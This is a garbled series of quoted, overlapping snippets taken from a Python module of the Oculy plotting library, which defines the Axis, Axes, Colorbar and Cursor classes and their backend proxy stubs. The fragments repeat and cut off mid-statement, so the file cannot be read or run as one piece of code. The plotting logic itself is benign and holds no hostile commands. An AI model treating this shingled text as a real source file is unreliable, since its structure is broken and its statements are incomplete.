distributed with this software.", "plot) -> None: \"\"\"Add a plot to the axes.\"\"\" if plot.id in self.plots:", "class Axis(PlotElement): \"\"\"Axis of a plot.\"\"\" #: Reference to the parent axes. axes", "Font used for the tick labels tick_labels_font = Dict(str) #: aspect_ratio = Int(20)", "the terms of the BSD license. # # The full license is in", "self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver)", "= self.backend_name p.initialize(resolver) #: Conserve a reference to the resolver to be able", "a 2D plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes)", "pass @mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title: str, font:", "ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale):", "Need to specify to which axes the cursor is bound pass @mark_backend_unsupported def", "axis with the other axis in data coordinate. #: Setting this values will", "self.left_axis): axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What axis are we", ") if not self.proxy: raise RuntimeError(f\"Axes {self} does not have an active proxy.\")", "Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class", "and their associated proxy. \"\"\" from typing import Any, Mapping, Optional, Sequence, Tuple", "f\"The axes used for {[lab for lab, _ in unknown]} do not \"", "axes.axes[ax] is not None]}, \" f\"specified axes are {[pa for _, pa in", "AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in matplotlib an axis is expected to provide", "pa not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None )", "\"\"\" from typing import Any, Mapping, Optional, Sequence, Tuple from atom.api import Bool,", "= Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis be autoscaled auto_scaling =", "distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy.", "intercept = Float() # FIXME Add connections to the proxy and a way", "self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def", "position: float, bounds: Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def remove_line(self, id:", "or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of the", "be able to add more elements #: later on. self._resolver = resolver def", "ability to link axes (accross different figures ie beyond # matplotlib default) #", "\"\"\"Proxy for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): #", "to be used. if any( ( pa not in (\"left\", \"bottom\", \"right\", \"top\")", "def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits): # Limited to axis", "Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for", "limits): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def", "if self.left_axis else \"right\", } plot.axes_mapping = axes # Validate the axes supposed", "Optional, Sequence, Tuple from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List,", "RuntimeError( f\"The axes used for {[lab for lab, _ in unknown]} do not", "no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self, title: str,", "-------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy. \"\"\" from typing import Any,", "valid axes (valid axes are \" \"'left', 'right', 'top', 'bottom', provided axes are", "unknown = [] missing = [] for lab, pa in axes.items(): if pa", "#: Reference to the figure holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes", "Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with plot if any. colorbar =", "expected to provide way to draw into the axis and way to manipulate", "connections to the proxy and a way to prevent self recursion # FIXME", "import Figure return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to", "a major grid major_grid_enabled = Bool() #: Display a minor grid minor_grid_enabled =", "used. if any( ( pa not in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self,", "Make sure the plot knows where it is plotted. plot.axes = self self.plots[plot.id]", "not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to", "str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str):", "in self.plots: raise RuntimeError(f\"A plot with {id} already exist in axes {self}\") axes", "colorbar and their associated proxy. \"\"\" from typing import Any, Mapping, Optional, Sequence,", "not None]}, \" f\"specified axes are {[pa for _, pa in missing]}.\" )", "the colorbar should be created. location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should", "are we linked to pass def remove_cursor(self, index: int): pass def add_plot(self, plot)", "List(str) #: Font used for the label label_font = Dict(str) #: Font used", "from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str from atom.api", "labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class", "def set_limits(self, limits): # Limited to axis with no breaks pass @mark_backend_unsupported def", "@mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for", "= Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #: x_value = Float() #:", "not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None:", "def remove_plot(self, id): \"\"\"Remove a plot based on its ID.\"\"\" if id not", "in missing]}.\" ) # Make sure the plot knows where it is plotted.", "axes are \" f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is not None]},", "Tuple[str, str]): # What axis are we linked to pass def remove_cursor(self, index:", "id not in self.plots: raise KeyError( f\"Plot {id} does not exist in axes", "class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference to the parent axes.", "currently displayed in the axes plots = Dict(str, BasePlot) #: Display a major", "\"\"\"Proxy for axes. As in matplotlib an axis is expected to provide way", "self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name", "-> None: \"\"\"Add a plot to the axes.\"\"\" if plot.id in self.plots: raise", "labels. tick_labels = List(str) #: Font used for the label label_font = Dict(str)", "\"\"\"Add a colorbar to the axes.\"\"\" if self.colorbar: return self.colorbar = Colorbar(axes=self) if", "or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self)", "remove_plot(self, id): \"\"\"Remove a plot based on its ID.\"\"\" if id not in", "@mark_backend_unsupported def add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]]", "def remove_line(self, id: str) -> None: pass # FIXME Need to define the", "lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self,", "disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self,", "created. location = Enum(\"right\", \"top\", \"left\", \"bottom\") #: Should that axis be autoscaled", "import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for", "def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self,", "the plot knows where it is plotted. plot.axes = self self.plots[plot.id] = plot", "Initialize the plot if we have a resolver if self._resolver: plot.initialize(self._resolver) def remove_plot(self,", "class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self,", "None]}, \" f\"specified axes are {[pa for _, pa in missing]}.\" ) #", "colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar def add_line( self, id: str, orientation:", "The full license is in the file LICENCE, distributed with this software. #", "limits): # Limited to axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits):", "proxy def _resolve_figure(): from .figure import Figure return Figure class Axes(PlotElement): \"\"\"Axes of", "of a plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes)", "no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self, state: bool):", "based on its ID.\"\"\" if id not in self.plots: raise KeyError( f\"Plot {id}", "labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass", "remove_cursor(self, index: int): pass def add_plot(self, plot) -> None: \"\"\"Add a plot to", "\"correspond to any valid axes (valid axes are \" \"'left', 'right', 'top', 'bottom',", "have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a colorbar to the", "disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported", "default) # --- Private API #: Reference to the backend resolver needed to", "def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass @mark_backend_unsupported def", "bool): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def", "plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Should", "add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]] = None,", "self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver)", "None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes used for {[lab for", "_ in missing]} do not \" \"exist. Existing axes are \" f\"{[ax for", "of 2 tuple representing a possibly discountinuous axis. limits = List(tuple) #: Label", "lab, _ in unknown]} do not \" \"correspond to any valid axes (valid", "to enable zooming/panning and modifiers # TODO Add the ability to link axes", "a plot based on its ID.\"\"\" if id not in self.plots: raise KeyError(", "pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self): pass @mark_backend_unsupported def enable_minor_grid(self): pass", "Optional[Tuple[float, float]] = None, ): pass @mark_backend_unsupported def remove_line(self, id: str) -> None:", "of plots currently displayed in the axes plots = Dict(str, BasePlot) #: Display", "#: Projection to use on the axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self,", "pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass class CursorProxy(PlotElementProxy): \"\"\"Proxy", "What axis are we linked to pass def remove_cursor(self, index: int): pass def", "active on the graph cursors = ATuple(Cursor) #: Set of plots currently displayed", "if not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the", "link axes (accross different figures ie beyond # matplotlib default) # --- Private", "@mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ): # Need to", "Set of plots currently displayed in the axes plots = Dict(str, BasePlot) #:", "or getattr(self, f\"{pa}_axis\") is None ) for pa in axes.values() ): unknown =", "axes=None ): # Need to specify to which axes the cursor is bound", "# # Distributed under the terms of the BSD license. # # The", "\"\"\"Add a plot to the axes.\"\"\" if plot.id in self.plots: raise RuntimeError(f\"A plot", "the file LICENCE, distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and", "a plot\"\"\" #: Reference to the figure holding the axes. figure = ForwardTyped(_resolve_figure)", "resolver to be able to add more elements #: later on. self._resolver =", "self.plots.values(): p.finalize() for c in self.cursors: c.finalize() if self.colorbar: self.colorbar.finalize() for axis in", "to which axes the cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported", "def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def", "is in the file LICENCE, distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes,", "\"'left', 'right', 'top', 'bottom', provided axes are \" f\"{[pa for _, pa in", "font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy", "proxy and a way to prevent self recursion # FIXME Add convenience to", "from atom.api import Tuple as ATuple from atom.api import Typed from ..backends.resolver import", "\"\"\"Proxy for a single axis. Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def", "# TODO Add the ability to link axes (accross different figures ie beyond", "else \"top\", \"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping = axes #", "possibly discountinuous axis. limits = List(tuple) #: Label of the axis label =", "for the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin,", "= Bool() #: # SHOULD NOT be edited in place. legends = Dict(str,", "data coordinate. #: Setting this values will have an impact only if there", "self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize() del self.colorbar", "Add the ability to link axes (accross different figures ie beyond # matplotlib", "pa)) if missing: raise RuntimeError( f\"The axes used for {[lab for lab, _", "--- Private API #: Reference to the backend resolver needed to dynamically add", "the axis label = Str() #: Tick labels. tick_labels = List(str) #: Font", "axes # Validate the axes supposed to be used. if any( ( pa", "are \" f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is not None]}, \"", "None: pass # FIXME Need to define the proper API to enable zooming/panning", "to sync to the proxy def _resolve_figure(): from .figure import Figure return Figure", "in missing]} do not \" \"exist. Existing axes are \" f\"{[ax for ax", "= Typed(Axis) #: Colorbar associated with plot if any. colorbar = Typed(Colorbar) #:", "= Dict(str) #: aspect_ratio = Int(20) class Cursor(PlotElement): \"\"\"Cursor on a plot.\"\"\" #:", "Should that axis be autoscaled auto_scaling = Bool() #: List of 2 tuple", "CursorProxy(PlotElementProxy): \"\"\"Proxy for a cursor.\"\"\" pass class AxesProxy(PlotElementProxy): \"\"\"Proxy for axes. As in", "not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis or self.right_axis: self.left_axis", "resolver def finalize(self): \"\"\"Finalize the proxy of the figure.\"\"\" for p in self.plots.values():", "the figure holding the axes. figure = ForwardTyped(_resolve_figure) #: Axes composing this object.", "\" \"'left', 'right', 'top', 'bottom', provided axes are \" f\"{[pa for _, pa", "self.right_axis, self.top_axis): if not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name", "in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name", "#: Intercept position of this axis with the other axis in data coordinate.", "in axes.values() ): unknown = [] missing = [] for lab, pa in", "axes.items(): if pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes,", "associated with plot if any. colorbar = Typed(Colorbar) #: Set of cursors currently", "Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def", "id): pass @mark_backend_unsupported def add_line( self, id: str, orientation: str, position: float, bounds:", "pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass", "Str() #: Tick labels. tick_labels = List(str) #: Font used for the label", "proxy. \"\"\" from typing import Any, Mapping, Optional, Sequence, Tuple from atom.api import", "in place. legends = Dict(str, str) #: Projection to use on the axes.", "\"top\") or getattr(self, f\"{pa}_axis\") is None ) for pa in axes.values() ): unknown", "axes in the axes_set. intercept = Float() # FIXME Add connections to the", "f\"{pa}_axis\") is None ) for pa in axes.values() ): unknown = [] missing", "List(tuple) #: Label of the axis label = Str() #: Tick labels. tick_labels", "file LICENCE, distributed with this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their", "of this axis with the other axis in data coordinate. #: Setting this", "ForwardTyped(_resolve_figure) #: Axes composing this object. left_axis = Typed(Axis) bottom_axis = Typed(Axis) right_axis", "git history for more details. # # Distributed under the terms of the", "in (\"left\", \"bottom\", \"right\", \"top\") or getattr(self, f\"{pa}_axis\") is None ) for pa", "Setting this values will have an impact only if there are only 2", "resolver): \"\"\"Initialize the proxy of the object and the axes.\"\"\" super().initialize(resolver) for axis", "#: Setting this values will have an impact only if there are only", "self.left_axis else \"right\", } plot.axes_mapping = axes # Validate the axes supposed to", "in axes {self.axes},\" f\" known plots are {self.plots}\" ) if not self.proxy: raise", "full license is in the file LICENCE, distributed with this software. # --------------------------------------------------------------------------------------", "colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self,", "direction inverted. inverted = Bool() #: Label of the axis label = Str()", "atom.api import Typed from ..backends.resolver import BackendResolver from .base import BasePlot, PlotElement, PlotElementProxy,", "lab, _ in missing]} do not \" \"exist. Existing axes are \" f\"{[ax", "Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy of the object and the axes.\"\"\"", "in unknown]} do not \" \"correspond to any valid axes (valid axes are", "the BSD license. # # The full license is in the file LICENCE,", "this software. # -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy. \"\"\" from", "button: str): pass @mark_backend_unsupported def disable_panning(self): pass @mark_backend_unsupported def add_axis(self, axes=None): pass @mark_backend_unsupported", "set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line(", "\"\"\"Axis, axes, colorbar and their associated proxy. \"\"\" from typing import Any, Mapping,", "a plot.\"\"\" #: Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #:", "#: Font used for the tick labels tick_labels_font = Dict(str) #: aspect_ratio =", "Mapping[str, str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id:", "plot.\"\"\" #: x_value = Float() #: y_value = Float() #: c_value = Float(float(\"nan\"))", "\"top\", \"left\", \"bottom\") #: Should that axis be autoscaled auto_scaling = Bool() #:", "\"right\", } plot.axes_mapping = axes # Validate the axes supposed to be used.", "of a plot\"\"\" #: Reference to the figure holding the axes. figure =", "Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated with plot if", "'right', 'top', 'bottom', provided axes are \" f\"{[pa for _, pa in unknown]}).\"", "title: str, font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str,", "in axes.items(): if pa not in (\"left\", \"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif", "import Tuple as ATuple from atom.api import Typed from ..backends.resolver import BackendResolver from", "set_projections(self): pass @mark_backend_unsupported def add_cursor( self, axes=None ): # Need to specify to", "\"y\": \"left\" if self.left_axis else \"right\", } plot.axes_mapping = axes # Validate the", "self.backend_name p.initialize(resolver) #: Conserve a reference to the resolver to be able to", "#: y_value = Float() #: c_value = Float(float(\"nan\")) # FIXME need to sync", "Typed(Colorbar) #: Set of cursors currently active on the graph cursors = ATuple(Cursor)", "\"left\", \"bottom\") #: Should that axis be autoscaled auto_scaling = Bool() #: List", "Figure return Figure class Axes(PlotElement): \"\"\"Axes of a plot\"\"\" #: Reference to the", "with plot if any. colorbar = Typed(Colorbar) #: Set of cursors currently active", "axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def invert_axis(self,", "position: str): pass class ColorbarProxy(PlotElementProxy): \"\"\"Proxy for the colorbar attached to a colorplot.\"\"\"", "def add_cursor(self, axes: Tuple[str, str]): # What axis are we linked to pass", "# -------------------------------------------------------------------------------------- \"\"\"Axis, axes, colorbar and their associated proxy. \"\"\" from typing import", "axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name =", "\"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self)", "@mark_backend_unsupported def invert_axis(self, state: bool): pass @mark_backend_unsupported def set_label(self, title: str, font: Mapping[str,", "import Any, Mapping, Optional, Sequence, Tuple from atom.api import Bool, Dict, Enum, Float,", "on a plot.\"\"\" #: x_value = Float() #: y_value = Float() #: c_value", "#: Set of cursors currently active on the graph cursors = ATuple(Cursor) #:", "@mark_backend_unsupported def disable_minor_grid(self): pass @mark_backend_unsupported def set_legend(self, legend: Mapping[str, str]): pass @mark_backend_unsupported def", "log raise NotImplementedError() @mark_backend_unsupported def set_autoscaling(self, setting: bool): pass @mark_backend_unsupported def set_limits(self, limits):", "plot knows where it is plotted. plot.axes = self self.plots[plot.id] = plot #", "pa in axes.values() ): unknown = [] missing = [] for lab, pa", "unknown]}).\" ) else: raise RuntimeError( f\"The axes used for {[lab for lab, _", "plot.axes_mapping = axes # Validate the axes supposed to be used. if any(", "f\"{pa}_axis\") is None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes used for", "in unknown]}).\" ) else: raise RuntimeError( f\"The axes used for {[lab for lab,", "Validate the axes supposed to be used. if any( ( pa not in", "self.colorbar def add_line( self, id: str, orientation: str, position: float, bounds: Optional[Tuple[float, float]]", "Tuple as ATuple from atom.api import Typed from ..backends.resolver import BackendResolver from .base", "self recursion # FIXME Add convenience to connect axes between them class Colorbar(PlotElement):", "a single axis. Handle: - scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale):", "axis label = Str() #: Tick labels. tick_labels = List(str) #: Font used", "font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_labels(self, labels: Sequence[str], font: Mapping[str, Any]): pass", "details. # # Distributed under the terms of the BSD license. # #", "@mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def enable_panning(self, button: str): pass @mark_backend_unsupported def disable_panning(self):", "to the parent axes. axes = ForwardTyped(lambda: Axes) #: Should that axis be", "connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D plot.\"\"\" #: Reference", "the parent axes. axes = ForwardTyped(lambda: Axes) #: Should that axis be autoscaled", "Reference to the parent axes. axes = ForwardTyped(lambda: Axes) #: Position at which", "not axis: continue axis.backend_name = self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver)", "self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors: c.backend_name = self.backend_name c.initialize(resolver) for", "proxy of the figure.\"\"\" for p in self.plots.values(): p.finalize() for c in self.cursors:", "} plot.axes_mapping = axes # Validate the axes supposed to be used. if", "Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from the axes.\"\"\" self.colorbar.finalize()", "RuntimeError(f\"A plot with {id} already exist in axes {self}\") axes = plot.axes_mapping if", "more details. # # Distributed under the terms of the BSD license. #", "Typed(Axis) bottom_axis = Typed(Axis) right_axis = Typed(Axis) top_axis = Typed(Axis) #: Colorbar associated", "provided axes are \" f\"{[pa for _, pa in unknown]}).\" ) else: raise", "# matplotlib default) # --- Private API #: Reference to the backend resolver", "axes = { \"x\": \"bottom\" if self.bottom_axis else \"top\", \"y\": \"left\" if self.left_axis", "Sequence, Tuple from atom.api import Bool, Dict, Enum, Float, ForwardTyped, Int, List, Str", "def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if", "not in self.plots: raise KeyError( f\"Plot {id} does not exist in axes {self.axes},\"", "of the figure.\"\"\" for p in self.plots.values(): p.finalize() for c in self.cursors: c.finalize()", "RuntimeError(f\"Axes {self} does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add", "if any. colorbar = Typed(Colorbar) #: Set of cursors currently active on the", "Axes) #: Position at which the colorbar should be created. location = Enum(\"right\",", "= Dict(str, str) #: Projection to use on the axes. projection = Enum(\"cartesian\",", "axis.finalize() super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What axis are we linked", "def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self): pass @mark_backend_unsupported def", "position: float, bounds: Optional[Tuple[float, float]] = None, ): pass def remove_line(self, id: str)", "for axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name =", "ATuple from atom.api import Typed from ..backends.resolver import BackendResolver from .base import BasePlot,", "is None ) for pa in axes.values() ): unknown = [] missing =", "into the axis and way to manipulate the axis appearance. \"\"\" @mark_backend_unsupported def", "= self.backend_name c.initialize(resolver) for p in self.plots.values(): p.backend_name = self.backend_name p.initialize(resolver) #: Conserve", "= Dict(str) #: Intercept position of this axis with the other axis in", "plotted. plot.axes = self self.plots[plot.id] = plot # Initialize the plot if we", "the resolver to be able to add more elements #: later on. self._resolver", "\" f\"{[ax for ax in axes.axes._fields if axes.axes[ax] is not None]}, \" f\"specified", ".base import BasePlot, PlotElement, PlotElementProxy, mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis.", "def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id: str, orientation: str, position:", "Colorbar associated with plot if any. colorbar = Typed(Colorbar) #: Set of cursors", "Dict(str, BasePlot) #: Display a major grid major_grid_enabled = Bool() #: Display a", "not \" \"correspond to any valid axes (valid axes are \" \"'left', 'right',", "mark_backend_unsupported class AxisProxy(PlotElementProxy): \"\"\"Proxy for a single axis. Handle: - scaling - bounds", "if id not in self.plots: raise KeyError( f\"Plot {id} does not exist in", "the colorbar attached to a colorplot.\"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log", "axes used for {[lab for lab, _ in missing]} do not \" \"exist.", "= [] for lab, pa in axes.items(): if pa not in (\"left\", \"bottom\",", "cursor is bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported", "str]): pass @mark_backend_unsupported def remove_plot(self, id): pass @mark_backend_unsupported def add_line( self, id: str,", "axis be autoscaled auto_scaling = Bool() #: List of 2 tuple representing a", "= Bool() #: Label of the axis label = Str() #: Tick labels.", "not self.left_axis or self.right_axis: self.left_axis = Axis(axes=self) def initialize(self, resolver): \"\"\"Initialize the proxy", "bound pass @mark_backend_unsupported def remove_cursor(self): pass @mark_backend_unsupported def enable_major_grid(self): pass @mark_backend_unsupported def disable_major_grid(self):", "the axes. projection = Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis", "Reference to the backend resolver needed to dynamically add axes _resolver = Typed(BackendResolver)", "labels tick_labels_font = Dict(str) #: Intercept position of this axis with the other", "axes=None): pass @mark_backend_unsupported def remove_axis(self): pass @mark_backend_unsupported def set_projections(self): pass @mark_backend_unsupported def add_cursor(", "self.plots: raise RuntimeError(f\"A plot with {id} already exist in axes {self}\") axes =", "\"bottom\", \"right\", \"top\"): unknown.append((lab, pa)) elif getattr(axes, f\"{pa}_axis\") is None: missing.append((lab, pa)) if", "List of 2 tuple representing a possibly discountinuous axis. limits = List(tuple) #:", "def initialize(self, resolver): \"\"\"Initialize the proxy of the object and the axes.\"\"\" super().initialize(resolver)", "- scaling - bounds \"\"\" @mark_backend_unsupported def set_axis_scale(self, scale): # lin, log raise", "label = Str() #: Tick labels. tick_labels = List(str) #: Font used for", "to prevent self recursion # FIXME Add convenience to connect axes between them", "do not \" \"exist. Existing axes are \" f\"{[ax for ax in axes.axes._fields", "this axis with the other axis in data coordinate. #: Setting this values", "super().finalize() def add_cursor(self, axes: Tuple[str, str]): # What axis are we linked to", "Sequence[str], font: Mapping[str, Any]): pass @mark_backend_unsupported def set_tick_position(self, position: str): pass class ColorbarProxy(PlotElementProxy):", "Add convenience to connect axes between them class Colorbar(PlotElement): \"\"\"Colorbar for a 2D", "Oculy Authors, see git history for more details. # # Distributed under the", "axis in (self.left_axis, self.bottom_axis, self.right_axis, self.top_axis): if not axis: continue axis.backend_name = self.backend_name", "= plot # Initialize the plot if we have a resolver if self._resolver:", "{self} does not have an active proxy.\") self.proxy.remove_plot(id, self.plots[id]) def add_colorbar(self): \"\"\"Add a", "#: Display a major grid major_grid_enabled = Bool() #: Display a minor grid", "**kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis = Axis(axes=self) if not self.left_axis", "known plots are {self.plots}\" ) if not self.proxy: raise RuntimeError(f\"Axes {self} does not", "axis with no breaks pass @mark_backend_unsupported def set_limits_with_breaks(self, limits): pass @mark_backend_unsupported def set_label(self,", "\"bottom\") #: Should that axis be autoscaled auto_scaling = Bool() #: List of", "(valid axes are \" \"'left', 'right', 'top', 'bottom', provided axes are \" f\"{[pa", "= self.backend_name axis.initialize(resolver) if self.colorbar: self.colorbar.backend_name = self.backend_name self.colorbar.initialize(resolver) for c in self.cursors:", "return self.colorbar = Colorbar(axes=self) if self._resolver: self.colorbar.initialize(self._resolver) def remove_colorbar(self): \"\"\"Remove the colorbar from", "c_value = Float(float(\"nan\")) # FIXME need to sync to the proxy def _resolve_figure():", "Intercept position of this axis with the other axis in data coordinate. #:", "= Bool() #: List of 2 tuple representing a possibly discountinuous axis. limits", "is None: missing.append((lab, pa)) if missing: raise RuntimeError( f\"The axes used for {[lab", "appearance. \"\"\" @mark_backend_unsupported def enable_zooming(self, bound: str, button: str): pass @mark_backend_unsupported def disable_zooming(self):", "= Enum(\"cartesian\", \"polar\") def __init__(self, **kwargs): super().__init__(**kwargs) if not self.bottom_axis or self.top_axis: self.bottom_axis", "will have an impact only if there are only 2 active #: axes", "index: int): pass def add_plot(self, plot) -> None: \"\"\"Add a plot to the", "= List(tuple) 